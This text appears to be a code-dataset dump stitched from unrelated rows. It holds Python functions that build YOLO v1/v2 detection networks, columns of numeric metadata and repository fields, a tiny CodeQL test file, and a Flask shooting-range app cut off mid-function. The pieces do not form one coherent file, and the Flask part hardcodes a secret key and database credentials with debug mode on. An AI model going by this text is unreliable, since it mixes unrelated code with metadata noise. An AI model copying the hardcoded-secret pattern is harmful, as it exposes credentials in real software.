model.add(BN(act=act))
# conv19 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act, name='BN6_19'))
# conv20 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
pointLayer2 = BN(act=act, name='BN6_20')
model.add(pointLayer2)
# conv21 7 26 * 26 * 512 -> 26 * 26 * 64
model.add(Conv2d(64, width=1, act='identity', include_bias=False, stride=1, src_layers=[pointLayer1]))
model.add(BN(act=act))
# reshape 26 * 26 * 64 -> 13 * 13 * 256
pointLayer3 = Reshape(act='identity', width=grid_number, height=grid_number, depth=256, name='reshape1')
model.add(pointLayer3)
# concat
model.add(Concat(act='identity', src_layers=[pointLayer2, pointLayer3]))
# conv22 7 13
model.add(Conv2d(1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(
Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes,
match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))
return model
def Tiny_YoloV2(conn, anchors, model_table='Tiny-Yolov2', n_channels=3, width=416, height=416, scale=1.0 / 255,
random_mutation=None, act='leaky', act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=5, do_sqrt=True, grid_number=13,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, match_anchor_size=None,
num_to_force_coord=None, random_flip=None, random_crop=None):
'''
Generate a deep learning model with the Tiny Yolov2 architecture.
Tiny Yolov2 is a very small model of Yolov2, so that it includes fewer
numbers of convolutional layer and batch normalization layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
anchors : list
Specifies the anchor box values.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 416
height : int, optional
Specifies the height of the input layer.
Default: 416
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in the
input layer.
Valid Values: 'none', 'random'
act : string, optional
Specifies the activation function for the batch normalization layers.
Default: 'leaky'
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 5
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 13
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
match_anchor_size : bool, optional
Whether to force the predicted box match the anchor boxes in sizes for all predictions
num_to_force_coord : int, optional
The number of leading chunk of images in training when the algorithm forces predicted objects
in each grid to be equal to the anchor box sizes, and located at the grid center
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1612.08242.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
# conv1 416 448
model.add(Conv2d(n_filters=16, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv2 208 224
model.add(Conv2d(n_filters=32, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv3 104 112
model.add(Conv2d(n_filters=64, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv4 52 56
model.add(Conv2d(n_filters=128, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv5 26 28
model.add(Conv2d(n_filters=256, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv6 13 14
model.add(Conv2d(n_filters=512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Pooling(width=2, height=2, stride=1, pool='max'))
# conv7 13
model.add(Conv2d(n_filters=1024, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
# conv8 13
model.add(Conv2d(n_filters=512, width=3, act='identity', include_bias=False, stride=1))
model.add(BN(act=act))
model.add(Conv2d((n_classes + 5) * predictions_per_grid, width=1, act='identity', include_bias=False, stride=1))
model.add(Detection(act=act_detection, detection_model_type='yolov2', anchors=anchors,
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes,
match_anchor_size=match_anchor_size, num_to_force_coord=num_to_force_coord))
return model
def YoloV1(conn, model_table='YoloV1', n_channels=3, width=448, height=448, scale=1.0 / 255,
random_mutation=None, act='leaky', dropout=0, act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=2, do_sqrt=True, grid_number=7,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Yolo V1 architecture.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 448
height : int, optional
Specifies the height of the input layer.
Default: 448
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in
the input layer.
Valid Values: 'none', 'random'
act: String, optional
Specifies the activation function to be used in the convolutional layer
layers and the final convolution layer.
Default: 'leaky'
dropout: double, optional
Specifies the drop out rate.
Default: 0
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 2
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 7
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1506.02640.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
# conv1 448
model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv2 224
model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv3 112
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
# conv4 112
model.add(Conv2d(64, width=1, act=act, include_bias=False, stride=1))
# conv5 112
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv6 56
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
# conv7 56
model.add(Conv2d(128, width=1, act=act, include_bias=False, stride=1))
# conv8 56
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv9 28
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
# conv10 28
model.add(Conv2d(256, width=1, act=act, include_bias=False, stride=1))
# conv11 28
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
# conv12 28
model.add(Conv2d(256, width=1, act=act, include_bias=False, stride=1))
# conv13 28
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
# conv14 14
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv15 14
model.add(Conv2d(512, width=1, act=act, include_bias=False, stride=1))
# conv16 14
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv17 14
model.add(Conv2d(512, width=1, act=act, include_bias=False, stride=1))
# conv18 14
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv19 14
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv20 7
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=2))
# conv21 7
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv22 7
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
# conv23 7
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))
model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
model.add(Detection(act = act_detection, detection_model_type = 'yolov1',
softmax_for_class_prob = softmax_for_class_prob, coord_type = coord_type,
class_number = n_classes, grid_number = grid_number,
predictions_per_grid = predictions_per_grid, do_sqrt = do_sqrt, coord_scale = coord_scale,
object_scale = object_scale, prediction_not_a_object_scale = prediction_not_a_object_scale,
class_scale = class_scale, detection_threshold = detection_threshold,
iou_threshold = iou_threshold, random_boxes = random_boxes,
max_label_per_image = max_label_per_image, max_boxes = max_boxes))
return model
def Tiny_YoloV1(conn, model_table='Tiny-YoloV1', n_channels=3, width=448, height=448, scale=1.0 / 255,
random_mutation=None, act='leaky', dropout=0, act_detection='AUTO', softmax_for_class_prob=True,
coord_type='YOLO', max_label_per_image=30, max_boxes=30,
n_classes=20, predictions_per_grid=2, do_sqrt=True, grid_number=7,
coord_scale=None, object_scale=None, prediction_not_a_object_scale=None, class_scale=None,
detection_threshold=None, iou_threshold=None, random_boxes=False, random_flip=None, random_crop=None):
'''
Generates a deep learning model with the Tiny Yolov1 architecture.
Tiny Yolov1 is a very small model of Yolov1, so that it includes
fewer numbers of convolutional layer.
Parameters
----------
conn : CAS
Specifies the connection of the CAS connection.
model_table : string, optional
Specifies the name of CAS table to store the model.
n_channels : int, optional
Specifies the number of the channels (i.e., depth) of the input layer.
Default: 3
width : int, optional
Specifies the width of the input layer.
Default: 448
height : int, optional
Specifies the height of the input layer.
Default: 448
scale : double, optional
Specifies a scaling factor to be applied to each pixel intensity values.
Default: 1.0 / 255
random_mutation : string, optional
Specifies how to apply data augmentations/mutations to the data in
the input layer.
Valid Values: 'none', 'random'
act: String, optional
Specifies the activation function to be used in the convolutional layer
layers and the final convolution layer.
Default: 'leaky'
dropout: double, optional
Specifies the drop out rate.
Default: 0
act_detection : string, optional
Specifies the activation function for the detection layer.
Valid Values: AUTO, IDENTITY, LOGISTIC, SIGMOID, TANH, RECTIFIER, RELU, SOFPLUS, ELU, LEAKY, FCMP
Default: AUTO
softmax_for_class_prob : bool, optional
Specifies whether to perform Softmax on class probability per
predicted object.
Default: True
coord_type : string, optional
Specifies the format of how to represent bounding boxes. For example,
a bounding box can be represented with the x and y locations of the
top-left point as well as width and height of the rectangle.
This format is the 'rect' format. We also support coco and yolo formats.
Valid Values: 'rect', 'yolo', 'coco'
Default: 'yolo'
max_label_per_image : int, optional
Specifies the maximum number of labels per image in the training.
Default: 30
max_boxes : int, optional
Specifies the maximum number of overall predictions allowed in the
detection layer.
Default: 30
n_classes : int, optional
Specifies the number of classes. If None is assigned, the model will
automatically detect the number of classes based on the training set.
Default: 20
predictions_per_grid : int, optional
Specifies the amount of predictions will be done per grid.
Default: 2
do_sqrt : bool, optional
Specifies whether to apply the SQRT function to width and height of
the object for the cost function.
Default: True
grid_number : int, optional
Specifies the amount of cells to be analyzed for an image. For example,
if the value is 5, then the image will be divided into a 5 x 5 grid.
Default: 7
coord_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects exist in the grid.
object_scale : float, optional
Specifies the weight for object detected for the cost function in
the detection layer.
prediction_not_a_object_scale : float, optional
Specifies the weight for the cost function in the detection layer,
when objects do not exist in the grid.
class_scale : float, optional
Specifies the weight for the class of object detected for the cost
function in the detection layer.
detection_threshold : float, optional
Specifies the threshold for object detection.
iou_threshold : float, optional
Specifies the IOU Threshold of maximum suppression in object detection.
random_boxes : bool, optional
Randomizing boxes when loading the bounding box information.
Default: False
random_flip : string, optional
Specifies how to flip the data in the input layer when image data is
used. Approximately half of the input data is subject to flipping.
Valid Values: 'h', 'hv', 'v', 'none'
random_crop : string, optional
Specifies how to crop the data in the input layer when image data is
used. Images are cropped to the values that are specified in the width
and height parameters. Only the images with one or both dimensions
that are larger than those sizes are cropped.
Valid Values: 'none', 'unique', 'randomresized', 'resizethencrop'
Returns
-------
:class:`Sequential`
References
----------
https://arxiv.org/pdf/1506.02640.pdf
'''
model = Sequential(conn=conn, model_table=model_table)
parameters = locals()
input_parameters = get_layer_options(input_layer_options, parameters)
if input_parameters['width'] != input_parameters['height']:
print(not_supported_feature('Non-square yolo model training', 'height=width'))
input_parameters['height'] = input_parameters['width']
model.add(InputLayer(**input_parameters))
model.add(Conv2d(16, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(32, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(64, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(128, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(512, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(1024, width=3, act=act, include_bias=False, stride=1))
model.add(Pooling(width=2, height=2, stride=2, pool='max'))
model.add(Conv2d(256, width=3, act=act, include_bias=False, stride=1, dropout=dropout))
model.add(Dense(n=(n_classes + (5 * predictions_per_grid)) * grid_number * grid_number, act='identity'))
model.add(Detection(act=act_detection, detection_model_type='yolov1',
softmax_for_class_prob=softmax_for_class_prob, coord_type=coord_type,
class_number=n_classes, grid_number=grid_number,
predictions_per_grid=predictions_per_grid, do_sqrt=do_sqrt, coord_scale=coord_scale,
object_scale=object_scale, prediction_not_a_object_scale=prediction_not_a_object_scale,
class_scale=class_scale, detection_threshold=detection_threshold,
iou_threshold=iou_threshold, random_boxes=random_boxes,
max_label_per_image=max_label_per_image, max_boxes=max_boxes))
return model
| 46.920921
| 121
| 0.681295
| 6,615
| 46,874
| 4.707483
| 0.05805
| 0.044188
| 0.059088
| 0.057932
| 0.947913
| 0.940559
| 0.937476
| 0.935356
| 0.935356
| 0.930186
| 0
| 0.035353
| 0.23241
| 46,874
| 998
| 122
| 46.967936
| 0.830128
| 0.511478
| 0
| 0.886207
| 0
| 0
| 0.055055
| 0.001017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017241
| false
| 0
| 0.013793
| 0
| 0.048276
| 0.017241
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b174bff58ca82ba08724a863f39109fcdce0e48c
| 33
|
py
|
Python
|
python/ql/test/library-tests/dependencies/a.py
|
vadi2/codeql
|
a806a4f08696d241ab295a286999251b56a6860c
|
[
"MIT"
] | 4,036
|
2020-04-29T00:09:57.000Z
|
2022-03-31T14:16:38.000Z
|
python/ql/test/library-tests/dependencies/a.py
|
vadi2/codeql
|
a806a4f08696d241ab295a286999251b56a6860c
|
[
"MIT"
] | 2,970
|
2020-04-28T17:24:18.000Z
|
2022-03-31T22:40:46.000Z
|
python/ql/test/library-tests/dependencies/a.py
|
ScriptBox99/github-codeql
|
2ecf0d3264db8fb4904b2056964da469372a235c
|
[
"MIT"
] | 794
|
2020-04-29T00:28:25.000Z
|
2022-03-30T08:21:46.000Z
|
import b
class A(b.B):
pass
| 6.6
| 13
| 0.575758
| 7
| 33
| 2.714286
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.30303
| 33
| 4
| 14
| 8.25
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 0.333333
| 0
| 0.666667
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
493d58539b5075dfaadb4b4efadb207c3969b673
| 41
|
py
|
Python
|
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
external/models/TransE_USE_h2/__init__.py
|
swapUniba/Elliot_refactor-tesi-Ventrella
|
3ddffc041696c90a6f6d3e8906c212fc4f55f842
|
[
"Apache-2.0"
] | null | null | null |
from .TransE_USE_h2 import TransE_USE_h2
| 20.5
| 40
| 0.878049
| 8
| 41
| 4
| 0.625
| 0.5625
| 0.6875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054054
| 0.097561
| 41
| 1
| 41
| 41
| 0.810811
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
49402908cc47d4a4f0ba191524384e5425efd183
| 442,812
|
py
|
Python
|
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
view.py
|
wasifa-airtel/FRAS_20171115
|
ac3891b361ae088aec7d616a3d9761b453fabba5
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Jul 31 15:16:47 2017
@author: wasifaahmed
"""
from flask import Flask, flash,render_template, request, Response, redirect, url_for, send_from_directory,jsonify,session
import json as json
from datetime import datetime,timedelta,date
from sklearn.cluster import KMeans
import numpy as np
from PIL import Image
from flask.ext.sqlalchemy import SQLAlchemy
import matplotlib.image as mpimg
from io import StringIO
from skimage import data, exposure, img_as_float ,io,color
import scipy
from scipy import ndimage
import time
import tensorflow as tf
import os , sys
import shutil
import numpy as np
import pandas as pd
from PIL import Image
from model import *
from sqlalchemy.sql import text
from sqlalchemy import *
from forms import *
import math
from io import StringIO
import csv
from sqlalchemy.orm import load_only
from datetime import datetime,date
from numpy import genfromtxt
from sqlalchemy.ext.serializer import loads, dumps
from sqlalchemy.orm import sessionmaker, scoped_session
from flask_bootstrap import Bootstrap
graph = tf.Graph()
with graph.as_default():
sess = tf.Session(graph=graph)
init_op = tf.global_variables_initializer()
pointsarray=[]
def load_model():
sess.run(init_op)
saver = tf.train.import_meta_graph('E:/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727.meta')
#saver = tf.train.import_meta_graph('/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727.meta')
print('The model is loading...')
#saver.restore(sess, "/Users/wasifaahmed/Documents/FRAS/Fras_production_v.0.1/FRAS Windows/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727")
saver.restore(sess, 'E:/FRAS Windows/FRAS_production/Simulation/FRAS_20170726/FRAS_20170727')
print('loaded...')
pass
engine =create_engine('postgresql://postgres:user@localhost/postgres')
Session = scoped_session(sessionmaker(bind=engine))
mysession = Session()
app = Flask(__name__)
app.config.update(
DEBUG=True,
SECRET_KEY='\xa9\xc2\xc6\xfa|\x82\x1a\xfa\x1b#~\xd6ppR=\x1e4\xfb`-\xc0\xad\xc9')
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://postgres:user@localhost/fras_production'
db.init_app(app)
Bootstrap(app)
@app.after_request
def add_header(response):
response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'
response.headers['Cache-Control'] = 'public, max-age=0'
return response
@app.route('/',methods=['GET', 'POST'])
def login():
form = LoginForm()
return render_template('forms/login.html', form=form)
@app.route('/home',methods=['GET', 'POST'])
def index():
return render_template('pages/home.html')
@app.route('/detail_setup/')
def Detail_Setup():
curdate=time.strftime("%Y-%m-%d")
selection=Shooting_Session.query.filter(Shooting_Session.date>=curdate).order_by(Shooting_Session.datetimestamp.desc()).all()
firer_1 = [row.service_id for row in Shooter.query.all()]
return render_template('pages/detail_setup.html',
data=selection,
firer_1=firer_1)
@app.route('/auto_setup/')
def auto_setup():
drop=[]
curdate=time.strftime("%Y-%m-%d")
form=BulkRegistrationForm()
selection_2=Shooting_Session.query.filter(Shooting_Session.date>=curdate).order_by(Shooting_Session.datetimestamp.desc()).all()
selection=TGroup.query.distinct(TGroup.group_no).filter(TGroup.date==curdate).all()
return render_template('pages/auto_setup.html',
data=selection, data_2=selection_2,form=form)
@app.route('/auto_setup_1/')
def auto_setup_1():
drop=[]
curdate=time.strftime("%Y-%m-%d")
form=BulkRegistrationForm()
selection_2=Shooting_Session.query.filter(Shooting_Session.date>=curdate).order_by(Shooting_Session.datetimestamp.desc()).all()
selection=TGroup.query.distinct(TGroup.group_no).all()
return render_template('pages/auto_setup_1.html',
data=selection, data_2=selection_2,form=form)
@app.route('/group_gen/',methods=['GET', 'POST'])
def group_gen():
da_1=None
da_2=None
da_3=None
da_4=None
da_5=None
da_6=None
da_7=None
da_8=None
if request.method == "POST":
data = request.get_json()
group=data['data']
session['group']=group
data=TGroup.query.filter(TGroup.group_no==group).scalar()
da_1=data.target_1_no
da_2=data.target_2_no
da_3=data.target_3_no
da_4=data.target_4_no
da_5=data.target_5_no
da_6=data.target_6_no
da_7=data.target_7_no
da_8=data.target_8_no
return jsonify(data1=da_1,
data2=da_2,
data3=da_3,
data4=da_4,
data5=da_5,
data6=da_6,
data7=da_7,
data8=da_8
)
@app.route('/detail_exitence_1/',methods=['GET', 'POST'])
def detail_exitence_1():
ra_1=None
da_1=None
detail=None
service_id_1=None
session=None
paper=None
set_no=None
cant=None
if request.method == "POST":
data = request.get_json()
detail=data['data']
dt=time.strftime("%Y-%m-%d")
data=db.session.query(Session_Detail).filter(Session_Detail.detail_no==detail).scalar()
db.session.query(TShooting).delete()
db.session.commit()
Tdetail_shots =TShooting(
date=datetime.now(),
datetimestamp=time.strftime("%Y-%m-%d %H:%M"),
session_id=data.session_id,
detail_no=data.detail_no,
target_1_id=data.target_1_id,
target_2_id=data.target_2_id,
target_3_id=data.target_3_id,
target_4_id=data.target_4_id,
target_5_id=data.target_5_id,
target_6_id=data.target_6_id,
target_7_id=data.target_7_id,
target_8_id=data.target_8_id,
paper_ref=data.paper_ref,
set_no=data.set_no,
save_flag=0
)
db.session.add(Tdetail_shots)
db.session.commit()
res=[]
ten=[]
gp_len=[]
tten=db.session.query(MPI.tendency_code).filter(MPI.firer_id==data.target_1_id).order_by(MPI.datetimestamp.desc()).limit(5).all()[::-1]
tres = db.session.query(Grouping.result).filter(Grouping.firer_id==data.target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
tgp = db.session.query(Grouping.grouping_length_f).filter(Grouping.firer_id==data.target_1_id).order_by(Grouping.datetimestamp.desc()).limit(5).all()[::-1]
for ele in tres:
for ele2 in ele:
res.append(ele2)
for ele3 in tten:
for ele4 in ele3:
ten.append(ele4)
for ele5 in tgp:
for ele6 in ele5:
gp_len.append(ele6)
da_1=db.session.query(Shooter.name).filter(Shooter.id==data.target_1_id).scalar()
cant_id=db.session.query(Shooter.cantonment_id).filter(Shooter.id==data.target_1_id).scalar()
cant=db.session.query(Cantonment.cantonment).filter(Cantonment.id==cant_id).scalar()
ra_1_id=db.session.query(Shooter.rank_id).filter(Shooter.id==data.target_1_id).scalar()
ra_1 = db.session.query(Rank.name).filter(Rank.id==ra_1_id).scalar()
session=db.session.query(TShooting.session_id).scalar()
paper=db.session.query(TShooting.paper_ref).scalar()
set_no=db.session.query(TShooting.set_no).scalar()
service_id_1 = db.session.query(Shooter.service_id).filter(Shooter.id==data.target_1_id).scalar()
return jsonify(
data1=da_1,
ra_1=ra_1,
detail=detail,
service_id_1=service_id_1,
session=session,
paper=paper,
set_no=set_no,
cant=cant,
res=res,
